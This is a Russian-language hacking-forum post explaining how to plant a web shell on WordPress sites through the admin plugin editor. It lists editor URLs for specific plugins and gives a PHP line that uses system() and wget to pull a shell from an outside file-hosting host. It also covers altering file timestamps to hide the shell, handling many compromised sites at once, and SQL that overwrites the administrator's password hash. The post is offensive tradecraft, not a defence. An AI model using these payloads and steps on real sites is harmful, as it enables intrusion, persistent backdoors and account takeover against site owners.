Prev Предыдущее сообщение   Следующее сообщение Next
Старый 17.11.2014, 05:03   #10
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Оттестировал заливку через плагины в WP

wp, 3.2.1, 3.3.1, 3.3.2, 3.6.1, 3.5.1, 3.7.1, 3.8.4, 3.9.2, 4.0 +

Быстрый линк на правку Hello Dolly, Akismet и т.д.

Правка http://[host]/wp-admin/plugin-editor.php?file=hello.php
Файл http://[host]/wp-content/plugins/hello.php

Правка http://[host]/wp-admin/plugin-editor.php?file=akismet/akismet.php
Файл http://[host]/wp-content/plugins/akismet/akismet.php

Стоит сказать, что лучше через Akismet не заливатся, так как в wp 4.0 доступ к /wp-content/plugins/akismet закрыт .htaccess..

А Hello Dolly скрипт /wp-content/plugins/hello.php вообще лежыт в видном месте.

Круче через какой-то другой плагин заливатся, например, если правим blogger-importer/blogger-importer.php

Правка http://[host]/wp-admin/plugin-editor.php?file=blogger-importer/blogger-importer.php
Файл http://[host]/wp-content/plugins/blogger-importer/blogger-importer.php

Заливка шелла. Подводные камни.
Если большие обьемы, то хочется сразу чтоб после правки шелл заливался =)
Некоторые могут не согласится, но мне больше нравится когда усе заливается 1 командой, нет левых HTML форм на ПК, не нужно все время прописывать путь к скрипту в той форме, где код выполняется и т.д.(это уже другая тема, но все-равно можно отнести косвенно к заливке через плагины в WP)

Самый удобный вариант
Код HTML:
@system('wget -O '. dirname(__FILE__) .'/love.php http://ge.tt/api/1/files/8kXCKh42/0/blob');
Для такой заливки шелл WSO 2.5.1 не годится!

Сразу после заливки хекеру нужно тачить три файла(каталог где лежит сам шелл; скрипт от WP, который правился; сам шелл).

Понятное дело, что это дело можно сделать и в WSO 2.5.1. Нормально еще когда 1 шелл, а когда 100, например, это уже ненормально. =)

Можно еще, как вариант, написать Action для WSO, чтоб можно было выбрать множество файлов и протачить их все, как в bk374k v.3, пароль 007.

Как узнать URL сайта с БД?
Ответ m0Hze в "Вопросы по уязвимостям"
Цитата:
Прочитай wp_options where option_name='siteurl'
Как сменить пароль администратора через SQL?
Цитата:
update `wp_users` set `user_pass`='$P$BBEWNAloVQRkwuJlFmaC8OchfA6DOH0' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

Последний раз редактировалось omen666; 17.11.2014 в 05:24..
omen666 вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot